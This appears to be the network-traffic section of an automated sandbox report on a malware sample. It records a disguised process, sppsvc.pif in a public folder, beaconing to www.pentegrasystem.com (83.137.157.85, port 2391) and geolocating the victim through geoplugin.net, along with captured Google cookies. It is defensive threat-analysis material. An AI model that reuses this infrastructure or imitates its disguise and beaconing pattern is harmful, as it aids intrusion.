                                                                                                                  Apr 26, 2024 21:56:24.329866886 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:56:24.589880943 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:24.593202114 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:56:24.593601942 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:56:24.909557104 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:25.542325974 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:25.592264891 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:56:25.850408077 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:25.881347895 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:56:26.033250093 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:56:26.190912962 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:26.274913073 CEST8049731178.237.33.50192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:26.275039911 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:56:26.320499897 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:56:26.571598053 CEST8049731178.237.33.50192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:26.571655989 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:56:26.589782000 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:56:26.927627087 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:27.570162058 CEST8049731178.237.33.50192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:27.571044922 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:56:37.253396034 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:37.299295902 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:56:39.769570112 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:56:40.079786062 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:56.259893894 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:56.259938955 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:56.260010004 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:56.260462999 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:56.260473967 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:56.964721918 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:56.964840889 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:56.966835022 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:56.966846943 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:56.967871904 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:56.976541042 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:57.020159960 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:57.655999899 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:57.656052113 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:57.656126022 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:57.656145096 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:57.656200886 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:57.656267881 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:57.656323910 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:57.656330109 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:57.656384945 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:57.656390905 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:57.656481028 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:57.656523943 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:57.660087109 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:57.660105944 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:57.660126925 CEST49732443192.168.2.540.127.169.103
                                                                                                                  Apr 26, 2024 21:56:57.660132885 CEST4434973240.127.169.103192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:03.970956087 CEST49734443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:57:03.970993042 CEST44349734142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:03.971071959 CEST49734443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:57:03.971381903 CEST49734443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:57:03.971400023 CEST44349734142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:04.915572882 CEST44349734142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:04.915858030 CEST49734443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:57:04.915874004 CEST44349734142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:04.916174889 CEST44349734142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:04.916451931 CEST49734443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:57:04.916507959 CEST44349734142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:04.960365057 CEST49734443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:57:07.256998062 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:07.258358002 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:57:07.579963923 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:14.346206903 CEST44349734142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:14.346256971 CEST44349734142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:14.346328020 CEST49734443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:57:14.545383930 CEST49734443192.168.2.5142.250.64.196
                                                                                                                  Apr 26, 2024 21:57:14.545423985 CEST44349734142.250.64.196192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:37.767338991 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:37.770062923 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:57:38.081480026 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:40.997860909 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:57:41.701189041 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:57:42.975378036 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:57:45.385389090 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:57:50.286396027 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:57:59.886413097 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:58:07.290245056 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:58:07.292342901 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:58:07.611794949 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:58:19.179440022 CEST4973180192.168.2.5178.237.33.50
                                                                                                                  Apr 26, 2024 21:58:37.300503969 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:58:37.304838896 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:58:37.611438990 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:59:07.319762945 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:59:07.321063042 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:59:07.667068958 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:59:37.319714069 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 21:59:37.322575092 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 21:59:37.649950027 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 22:00:07.320245981 CEST92314973083.137.157.85192.168.2.5
                                                                                                                  Apr 26, 2024 22:00:07.371572971 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 22:00:07.892141104 CEST497309231192.168.2.583.137.157.85
                                                                                                                  Apr 26, 2024 22:00:08.205214024 CEST92314973083.137.157.85192.168.2.5

                                                                                                                  UDP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Apr 26, 2024 21:55:59.660126925 CEST53555651.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:55:59.715420008 CEST53543951.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:55:59.852026939 CEST6523953192.168.2.51.1.1.1
                                                                                                                  Apr 26, 2024 21:55:59.852790117 CEST5500653192.168.2.51.1.1.1
                                                                                                                  Apr 26, 2024 21:55:59.977833986 CEST53652391.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:55:59.979015112 CEST53550061.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:02.143723965 CEST53539051.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:16.844623089 CEST4973253192.168.2.51.1.1.1
                                                                                                                  Apr 26, 2024 21:56:16.987740993 CEST53497321.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:17.892868996 CEST6528553192.168.2.51.1.1.1
                                                                                                                  Apr 26, 2024 21:56:18.018366098 CEST53652851.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:22.153664112 CEST53544511.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:24.023170948 CEST5039753192.168.2.51.1.1.1
                                                                                                                  Apr 26, 2024 21:56:24.329087019 CEST53503971.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:25.905813932 CEST5899053192.168.2.51.1.1.1
                                                                                                                  Apr 26, 2024 21:56:26.031994104 CEST53589901.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:44.031914949 CEST53536021.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:56:59.530332088 CEST53580951.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:00.248338938 CEST5015353192.168.2.51.1.1.1
                                                                                                                  Apr 26, 2024 21:57:00.376305103 CEST53501531.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:08.200331926 CEST53607901.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:27.855957031 CEST53515031.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:57:43.500474930 CEST6545153192.168.2.51.1.1.1
                                                                                                                  Apr 26, 2024 21:57:43.627187014 CEST53654511.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:58:14.269280910 CEST53625761.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:58:30.363583088 CEST5997253192.168.2.51.1.1.1
                                                                                                                  Apr 26, 2024 21:58:30.491169930 CEST53599721.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:58:54.495666981 CEST6426853192.168.2.51.1.1.1
                                                                                                                  Apr 26, 2024 21:58:54.622006893 CEST53642681.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:59:30.412638903 CEST53640061.1.1.1192.168.2.5
                                                                                                                  Apr 26, 2024 21:59:42.047749043 CEST138138192.168.2.5192.168.2.255
                                                                                                                  Apr 26, 2024 21:59:45.373955965 CEST6497453192.168.2.51.1.1.1
                                                                                                                  Apr 26, 2024 21:59:45.500214100 CEST53649741.1.1.1192.168.2.5

                                                                                                                  DNS Queries

                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                  Apr 26, 2024 21:55:59.852026939 CEST192.168.2.51.1.1.10xf2a5Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                  Apr 26, 2024 21:55:59.852790117 CEST192.168.2.51.1.1.10x7004Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                  Apr 26, 2024 21:56:16.844623089 CEST192.168.2.51.1.1.10x9c67Standard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                                                                                  Apr 26, 2024 21:56:17.892868996 CEST192.168.2.51.1.1.10x3dd3Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                                                                                  Apr 26, 2024 21:56:24.023170948 CEST192.168.2.51.1.1.10xf5beStandard query (0)www.pentegrasystem.comA (IP address)IN (0x0001)false
                                                                                                                  Apr 26, 2024 21:56:25.905813932 CEST192.168.2.51.1.1.10x9a5bStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                  Apr 26, 2024 21:57:00.248338938 CEST192.168.2.51.1.1.10xf171Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                  Apr 26, 2024 21:57:43.500474930 CEST192.168.2.51.1.1.10x7e81Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                  Apr 26, 2024 21:58:30.363583088 CEST192.168.2.51.1.1.10x118fStandard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                  Apr 26, 2024 21:58:54.495666981 CEST192.168.2.51.1.1.10x3617Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                  Apr 26, 2024 21:59:45.373955965 CEST192.168.2.51.1.1.10x2d52Standard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                                                                                                  DNS Answers

                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                  Apr 26, 2024 21:55:59.977833986 CEST1.1.1.1192.168.2.50xf2a5No error (0)www.google.com142.250.64.196A (IP address)IN (0x0001)false
                                                                                                                  Apr 26, 2024 21:55:59.979015112 CEST1.1.1.1192.168.2.50x7004No error (0)www.google.com65IN (0x0001)false
                                                                                                                  Apr 26, 2024 21:56:16.987740993 CEST1.1.1.1192.168.2.50x9c67No error (0)drive.google.com192.178.50.78A (IP address)IN (0x0001)false
                                                                                                                  Apr 26, 2024 21:56:18.018366098 CEST1.1.1.1192.168.2.50x3dd3No error (0)drive.usercontent.google.com142.250.217.193A (IP address)IN (0x0001)false
                                                                                                                  Apr 26, 2024 21:56:24.329087019 CEST1.1.1.1192.168.2.50xf5beNo error (0)www.pentegrasystem.com83.137.157.85A (IP address)IN (0x0001)false
                                                                                                                  Apr 26, 2024 21:56:26.031994104 CEST1.1.1.1192.168.2.50x9a5bNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                  Apr 26, 2024 21:57:00.376305103 CEST1.1.1.1192.168.2.50xf171No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                  Apr 26, 2024 21:57:43.627187014 CEST1.1.1.1192.168.2.50x7e81No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                  Apr 26, 2024 21:58:30.491169930 CEST1.1.1.1192.168.2.50x118fNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                  Apr 26, 2024 21:58:54.622006893 CEST1.1.1.1192.168.2.50x3617No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                  Apr 26, 2024 21:59:45.500214100 CEST1.1.1.1192.168.2.50x2d52No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                                                                                                  HTTP Request Dependency Graph

                                                                                                                  • www.google.com
                                                                                                                  • cxcs.microsoft.net
                                                                                                                  • fs.microsoft.com
                                                                                                                  • slscr.update.microsoft.com
                                                                                                                  • drive.usercontent.google.com
                                                                                                                  • geoplugin.net

                                                                                                                  HTTP Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.549731178.237.33.50805228C:\Users\Public\Libraries\sppsvc.pif
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Apr 26, 2024 21:56:26.320499897 CEST71OUTGET /json.gp HTTP/1.1
                                                                                                                  Host: geoplugin.net
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Apr 26, 2024 21:56:26.571598053 CEST1169INHTTP/1.1 200 OK
                                                                                                                  date: Fri, 26 Apr 2024 19:56:26 GMT
                                                                                                                  server: Apache
                                                                                                                  content-length: 961
                                                                                                                  content-type: application/json; charset=utf-8
                                                                                                                  cache-control: public, max-age=300
                                                                                                                  access-control-allow-origin: *
                                                                                                                  Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 30 32 2e 31 32 39 2e 31 35 32 2e 32 32 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4d 69 61 6d 69 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 46 6c 6f 72 69 64 61 22 2c 0a 20 20 22 67 65 6f [TRUNCATED]
                                                                                                                  Data Ascii: { "geoplugin_request":"102.129.152.220", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Miami", "geoplugin_region":"Florida", "geoplugin_regionCode":"FL", "geoplugin_regionName":"Florida", "geoplugin_areaCode":"", "geoplugin_dmaCode":"528", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"25.7689", "geoplugin_longitude":"-80.1946", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                                                                                                  HTTPS Proxied Packets

                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  0192.168.2.549710142.250.64.1964437232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-04-26 19:56:00 UTC623OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                  Host: www.google.com
                                                                                                                  Connection: keep-alive
                                                                                                                  X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-04-26 19:56:00 UTC1703INHTTP/1.1 200 OK
                                                                                                                  Date: Fri, 26 Apr 2024 19:56:00 GMT
                                                                                                                  Pragma: no-cache
                                                                                                                  Expires: -1
                                                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                                                  Content-Type: text/javascript; charset=UTF-8
                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-reNsAg0D8DW851RnEAZm8A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                  Permissions-Policy: unload=()
                                                                                                                  Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                  Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                  Server: gws
                                                                                                                  X-XSS-Protection: 0
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Accept-Ranges: none
                                                                                                                  Vary: Accept-Encoding
                                                                                                                  Connection: close
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  2024-04-26 19:56:00 UTC785INData Raw: 33 30 61 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 62 6c 69 7a 7a 61 72 64 20 63 61 6e 63 65 6c 65 64 20 62 6c 69 7a 7a 63 6f 6e 22 2c 22 6c 6f 72 64 20 6f 66 20 74 68 65 20 72 69 6e 67 73 20 69 6e 20 74 68 65 61 74 65 72 73 20 32 30 32 34 22 2c 22 75 73 63 20 67 72 61 64 75 61 74 69 6f 6e 20 63 65 72 65 6d 6f 6e 79 22 2c 22 62 75 63 73 20 64 72 61 66 74 20 70 69 63 6b 73 22 2c 22 6c 61 79 6f 66 66 73 20 62 72 69 73 74 6f 6c 20 6d 79 65 72 73 20 73 71 75 69 62 62 22 2c 22 63 68 69 63 61 67 6f 20 62 65 61 72 73 20 6e 66 6c 20 64 72 61 66 74 20 70 69 63 6b 73 20 32 30 32 34 22 2c 22 73 74 65 6c 6c 61 72 20 62 6c 61 64 65 20 69 67 6e 22 2c 22 6c 61 67 75 61 72 64 69 61 20 61 69 72 70 6f 72 74 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22
                                                                                                                  Data Ascii: 30a)]}'["",["blizzard canceled blizzcon","lord of the rings in theaters 2024","usc graduation ceremony","bucs draft picks","layoffs bristol myers squibb","chicago bears nfl draft picks 2024","stellar blade ign","laguardia airport"],["","","","","","","
                                                                                                                  2024-04-26 19:56:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  1192.168.2.549708142.250.64.1964437232C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  2024-04-26 19:56:00 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                  Host: www.google.com
                                                                                                                  Connection: keep-alive
                                                                                                                  Sec-Fetch-Site: none
                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                  2024-04-26 19:56:01 UTC1816INHTTP/1.1 302 Found
                                                                                                                  Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgRmgZjcGNCNsLEGIjAPz7Z-sxmQbwjGDUKQhGNHe3uFLGpixSE6dDkpQnkirN1wFN14uBExRy9KThI8xLgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                  x-hallmonitor-challenge: CgwI0I2wsQYQtML1wAMSBGaBmNw
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                  Permissions-Policy: unload=()
                                                                                                                  Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                  Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                  P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                  Date: Fri, 26 Apr 2024 19:56:00 GMT
                                                                                                                  Server: gws
                                                                                                                  Content-Length: 427
                                                                                                                  X-XSS-Protection: 0
                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                  Set-Cookie: 1P_JAR=2024-04-26-19; expires=Sun, 26-May-2024 19:56:00 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                  Set-Cookie: NID=513=PFvBH79M4E1FdoZGJbp55bxReZbW8CJLMF1_rd6UP8AZnF3eVgVQnjcuIWJt85OcM5__5tCZpEcQWAd070fRLpfv309oZM996bCNskSY7fmGUDe-yL2iiaU08CIMe3nYzAyrLh5cm5jEqUIbe3wRoKRSm4osn3Fv3FZkzk13tF0; expires=Sat, 26-Oct-2024 19:56:00 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                  Connection: close
